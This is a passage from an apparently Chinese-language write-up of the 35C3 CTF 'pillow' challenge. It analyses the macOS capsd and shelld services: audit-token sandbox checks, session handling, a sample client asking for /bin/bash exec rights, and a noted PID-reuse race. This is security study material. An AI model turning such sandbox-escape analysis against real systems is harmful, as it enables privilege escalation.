argument_1，</span><br><span class="line">          argument_2，</span><br><span class="line">          ...</span><br><span class="line">      <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">      ...</span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    pid_2 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        operation_1 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">          argument_1，</span><br><span class="line">          argument_2，</span><br><span class="line">          ...</span><br><span class="line">      <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">      operation_2 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">          argument_1，</span><br><span class="line">          argument_2，</span><br><span class="line">          ...</span><br><span class="line">      <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">      ...</span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    ...</span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></li></ul><p>不过这不是重点。注意到 <code>sandbox_check_by_audit_token</code> 函数的第一个参数 token 是由 grant_capability_internal 函数传入的：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability_internal</span><span class="params">(<span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">sandbox_check_by_audit_token</span>(token, op, SANDBOX_CHECK_NO_REPORT, arg, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>) == <span class="number">0</span>) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而 grant_capability_internal 函数的第一个参数，是直接与<strong>信息发送方</strong>挂钩：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">audit_token_t</span> creds;</span><br><span class="line"><span class="comment">// TODO check xpc_dictionary_set_audit_token</span></span><br><span class="line"><span class="built_in">xpc_dictionary_get_audit_token</span>(msg, &amp;creds);</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (...) &#123;</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="built_in">grant_capability_internal</span>(creds, ...) == KERN_SUCCESS);</span><br><span class="line">&#125; </span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>因此，传入 grant_capability_internal 函数的 pid，<strong>只是起到了一个键的作用</strong>，真正用于判断 sandbox 的则是 <strong>audit token</strong>。正常情况下消息发送者的 pid 理应和发送请求中的 pid 相同（即发送者应该发送自己的 PID 给 service）。</p><p>最后再说明一下<code>sandbox_check_by_audit_token</code> 函数，这个函数几乎没有任何说明文档可供查阅：</p><ul><li><p>作用：<strong>检查某些操作是否允许在沙箱返回内执行</strong>，如果允许则返回 <strong>0</strong>，即 <code>DECISION_ALLOW</code>。</p></li><li><p>函数定义：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">extern</span> <span class="type">int</span> SANDBOX_CHECK_NO_REPORT;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sandbox_check_by_audit_token</span><span class="params">(<span class="type">audit_token_t</span> token, <span class="type">const</span> <span class="type">char</span>* operation, <span class="type">int</span> flags, ...)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>函数参数：</p><ul><li>通常 flags 为 <code>SANDBOX_CHECK_NO_REPORT</code>，这表示以<strong>静默方式</strong>检查沙箱权限，不输出任何信息</li></ul></li><li><p>operation 指向一个 <strong>沙箱权限规则字符串</strong>（类似scheme的语言，因此 scheme 语法很有用），我们可以在 <a href="https://wiki.mozilla.org/Sandbox/OS_X_Rule_Set">OSX Sandbox Rule Set</a> 中获得更多有用的沙箱权限规则描述示例。</p><ul><li>flags 后面 <code>var_args</code> 参数中的内容与 <code>operation</code>相关，例如：</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// mach-lookup com.apple....</span></span><br><span class="line"><span class="type">int</span> port_denied = <span class="built_in">sandbox_check</span>(pid, <span class="string">&quot;mach-lookup&quot;</span>, SANDBOX_CHECK_NO_REPORT, <span class="string">&quot;com.apple....&quot;</span>);</span><br><span class="line">  </span><br><span class="line"><span class="comment">// file-read-data path/to/file</span></span><br><span class="line"><span class="type">int</span> read_denied = <span class="built_in">sandbox_check</span>(pid, <span class="string">&quot;file-read-data&quot;</span>, SANDBOX_CHECK_NO_REPORT, <span class="string">&quot;path/to/file&quot;</span>);</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-client-c">c. client.c</h4><p>client 执行的操作很简单，此处略过说明：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 与 capsd 建立 xpc 连接</span></span><br><span class="line">    <span class="type">xpc_connection_t</span> connection = <span class="built_in">xpc_connection_create_mach_service</span>(<span class="string">&quot;net.saelo.capsd.xpc&quot;</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">xpc_connection_set_event_handler</span>(connection, ^(<span class="type">xpc_object_t</span> event) &#123;</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">xpc_connection_resume</span>(connection);</span><br><span class="line"></span><br><span class="line">    <span class="type">pid_t</span> pid;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Enter pid:&quot;</span>);</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>, &amp;pid);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Adding capability &#x27;process-exec*&#x27; for resource &#x27;/bin/bash&#x27; to process %d\n&quot;</span>, pid);</span><br><span class="line">    <span class="comment">// 创建 XPC 消息字典</span></span><br><span class="line">    <span class="type">xpc_object_t</span> msg = <span class="built_in">xpc_dictionary_create</span>(<span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_uint64</span>(msg, <span class="string">&quot;action&quot;</span>, ACTION_GRANT_CAPABILITY);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_int64</span>(msg, <span class="string">&quot;pid&quot;</span>, pid);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;operation&quot;</span>, <span class="string">&quot;process-exec*&quot;</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;argument&quot;</span>, <span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">    <span class="comment">// 发送并等待 server 的返回信息</span></span><br><span class="line">    <span class="type">xpc_object_t</span> reply = <span class="built_in">xpc_connection_send_message_with_reply_sync</span>(connection, msg);</span><br><span class="line">    <span class="comment">// 将返回信息输出</span></span><br><span class="line">    <span class="type">char</span>* description = <span class="built_in">xpc_copy_description</span>(reply);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Reply: %s\n&quot;</span>, description);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行效果：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108135557134.png" alt="image-20220108135557134"></p><h4 id="d-功能">d. 功能</h4><p>综合上面的代码，我们可以了解到，capsd 对 mach IPC 和 XPC 都提供了两个接口 <code>grand_capability</code> 和 <code>has_capability</code>。</p><p>其中， <code>grand_capability</code> 函数会判断<strong>消息发送方</strong>请求的沙箱权限是否被允许，如果是，则将其添加进<strong>全局字典</strong>中。</p><blockquote><p>grand 操作就指的是将请求的 op 和 args 添加进全局字典的这个操作，而并非实际分配了一个新权限。</p></blockquote><p>若下一次有请求判断某个 pid 是否有特定的沙箱权限时（<code>has_capability</code>），capsd 只会检查全局字典中是否有先前所保存的 op 和 args，并根据检查结果返回。</p><p>接下来我们再看看 shelld。</p><h3 id="2-shelld">2. shelld</h3><h4 id="a-shelld-defs">a. shelld.defs</h4><p>这里定义了4个接口，分别是 <code>shelld_create_session</code> 、 <code>shell_exec</code>、<code>register_completion_listener</code> 和 <code>unregister_completion_listener</code>。接口具体用法后面再说，干看 defs 也看不出来。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">subsystem shelld <span class="number">133700</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach_debug/mach_debug_types.defs&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;../common/types.h&quot;</span>;</span><br><span class="line"></span><br><span class="line">type string = c_string[*:<span class="number">4096</span>];</span><br><span class="line"></span><br><span class="line"><span class="function">routine <span class="title">shelld_create_session</span><span class="params">(server: <span class="type">mach_port_t</span>; name: string; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">shell_exec</span><span class="params">(server: <span class="type">mach_port_t</span>; session: string; command: string; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">register_completion_listener</span><span class="params">(server: <span class="type">mach_port_t</span>; session: string; listener: <span class="type">mach_port_t</span>; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">unregister_completion_listener</span><span class="params">(server: <span class="type">mach_port_t</span>; session: string; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br></pre></td></tr></table></figure><h4 id="b-shelld-client-defs">b. shelld_client.defs</h4><p>定义了接口 <code>shelld_client_notify</code>，目测可能是 Server 用于通知 Client 的。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">subsystem shelld_client <span class="number">133800</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach_debug/mach_debug_types.defs&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;../common/types.h&quot;</span>;</span><br><span class="line"></span><br><span class="line">type string = c_string[*:<span class="number">4096</span>];</span><br><span class="line"></span><br><span class="line"><span class="function">routine <span class="title">shelld_client_notify</span><span class="params">(listener: <span class="type">mach_port_t</span>; status: <span class="type">int</span>; output: string)</span></span>;</span><br></pre></td></tr></table></figure><h4 id="c-shelld-c">c. shelld.c</h4><h5 id="1-shelld-main-函数">1) shelld main 函数</h5><p>main 函数做了以下几件事情：</p><ol><li>创建了一个<strong>全局字典 <code>sessions</code></strong>。</li><li>创建一个权限为 rwxrwxrwx 的文件夹 <code>/private/tmp/shelld</code>。</li><li>从 bootstrap 中获取到 capsd 所注册的 mach port，同时将自己的 mach port 注册进 bootstrap 中。</li><li>为自己的 mach port 设置 MIG 的处理例程。</li></ol><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">kern_return_t</span> kr;</span><br><span class="line">    <span class="type">mach_port_t</span> bootstrap_port, service_port;</span><br><span class="line"></span><br><span class="line">    sessions = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">mkdir</span>(<span class="string">&quot;/private/tmp/shelld&quot;</span>, <span class="number">0777</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bootstrap_port);</span><br><span class="line"></span><br><span class="line">    kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;capsd_service_port);</span><br><span class="line">    <span class="built_in">ASSERT_KERN_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    kr = <span class="built_in">bootstrap_check_in</span>(bootstrap_port, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;service_port);</span><br><span class="line">    <span class="built_in">ASSERT_KERN_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_check_in&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_server);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line">    <span class="built_in">dispatch_main</span>();</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="2-register-completion-listener-函数">2) register_completion_listener 函数</h5><p>该函数的作用比较简单，初始时将 sessions 全局字典中找出<strong>符合 session_name 和 client</strong> 的字典，并将传入的 listener 的 mach port 存入进去。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">register_completion_listener</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">mach_port_t</span> listener, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, client);</span><br><span class="line">    <span class="keyword">if</span> (!session) &#123;</span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener);</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    CFNumberRef value = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;listener);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), value);</span><br><span class="line">    <span class="built_in">CFRelease</span>(value);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">CFMutableDictionaryRef <span class="title">lookup_session</span><span class="params">(<span class="type">const</span> <span class="type">char</span>* name, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFStringRef key = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, name, kCFStringEncodingASCII);</span><br><span class="line"></span><br><span class="line">    CFMutableDictionaryRef session = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryGetValueIfPresent</span>(sessions, key, (<span class="type">const</span> <span class="type">void</span>**)&amp;session)) &#123;</span><br><span class="line">        CFNumberRef cf_owner_pid = <span class="built_in">CFDictionaryGetValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;pid&quot;</span>));</span><br><span class="line">        <span class="type">int</span> owner_pid;</span><br><span class="line">        <span class="built_in">ASSERT</span>(<span class="built_in">CFNumberGetValue</span>(cf_owner_pid, kCFNumberSInt32Type, &amp;owner_pid));</span><br><span class="line">        <span class="keyword">if</span> (owner_pid != <span class="built_in">audit_token_to_pid</span>(client))</span><br><span class="line">            session = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">CFRelease</span>(key);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> session;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>此时可以暂时确定 sessions 字典的结构为：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;session_name1&quot;</span> <span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;pid1&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;xxx&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;listener&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;&lt;mach_port_t&gt;&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h5 id="3-unregister-completion-listener-函数">3) unregister_completion_listener 函数</h5><p>其行为与 <code>register_completion_listener</code> 相反，将 listener mach port 从 sessions 中移出。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">unregister_completion_listener</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, client);</span><br><span class="line">    <span class="keyword">if</span> (!session)</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">remove_listener</span>(session);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">remove_listener</span><span class="params">(CFMutableDictionaryRef session)</span> </span>&#123;</span><br><span class="line">    CFNumberRef value;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryGetValueIfPresent</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), (<span class="type">const</span> <span class="type">void</span>**)&amp;value)) &#123;</span><br><span class="line">        <span class="type">mach_port_t</span> listener;</span><br><span class="line">        <span class="built_in">ASSERT</span>(<span class="built_in">CFNumberGetValue</span>(value, kCFNumberSInt32Type, &amp;listener));</span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener);</span><br><span class="line">        <span class="built_in">CFDictionaryRemoveValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>));</span><br><span class="line">        <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="4-shelld-create-session-函数">4) shelld_create_session 函数</h5><p>该函数主要是在全局字典 sessions 中创建一些结构体，具体的操作以注释的形式写入代码中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">shelld_create_session</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 约束 session name 只能是字母或数字</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">const</span> <span class="type">char</span>* ptr = session_name; *ptr; ptr++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">isalnum</span>(*ptr)) &#123;</span><br><span class="line">            <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: denying invalid session name: %s&quot;</span>, session_name);</span><br><span class="line">            <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 不能重复创建相同名称的 session</span></span><br><span class="line">    CFStringRef key = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, session_name, kCFStringEncodingASCII);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryContainsKey</span>(sessions, key)) &#123;</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: session already exists: %s&quot;</span>, session_name);</span><br><span class="line">        <span class="built_in">CFRelease</span>(key);</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 创建 session 字典，并将其添加进全局 sessions 中</span></span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(sessions, key, session);</span><br><span class="line">    <span class="comment">// 将 audit token 对应的 pid 放入 session 字典中</span></span><br><span class="line">    <span class="type">pid_t</span> pid = <span class="built_in">audit_token_to_pid</span>(client);</span><br><span class="line"></span><br><span class="line">    CFNumberRef cf_pid = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;pid);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;pid&quot;</span>), cf_pid);</span><br><span class="line">    <span class="built_in">CFRelease</span>(cf_pid);</span><br><span class="line">    <span class="comment">// 为当前创建的 session 新建一个文件夹</span></span><br><span class="line">    <span class="type">char</span> workdir[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">snprintf</span>(workdir, <span class="built_in">sizeof</span>(workdir), <span class="string">&quot;/private/tmp/shelld/%s&quot;</span>, session_name);</span><br><span class="line">    <span class="built_in">mkdir</span>(workdir, <span class="number">0777</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note: this is racy: the client could exit and spawn a priviliged process into its PID before the server</span></span><br><span class="line">    <span class="comment">// gets here... Not too easy to exploit though from inside the sandbox so should be fine for a CTF :)</span></span><br><span class="line">    <span class="comment">// 设置传入pid所对应进程结束时的清除操作</span></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: cleaning up session for dead client %d&quot;</span>, pid);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">remove_listener</span>(session);</span><br><span class="line">        <span class="built_in">CFDictionaryRemoveValue</span>(sessions, key);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// TODO unlink directory here as well</span></span><br><span class="line"></span><br><span class="line">        <span class="built_in">CFRelease</span>(session);</span><br><span class="line">        <span class="built_in">CFRelease</span>(key);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">dispatch_source_cancel</span>(source);</span><br><span class="line">        <span class="built_in">dispatch_release</span>(source);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="5-shell-exec-函数">5) shell_exec 函数</h5><p>接下来的这个函数可谓是重头戏，需要好好说明一下。</p><ol><li><p>初始时，shelld 会判断传入的 command 是否为空。这里的 command 将被接下来所创建的子进程所使用，使用效果为 <code>system(command)</code>，因此 command 不能为空。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!command || <span class="built_in">strlen</span>(command) == <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span> 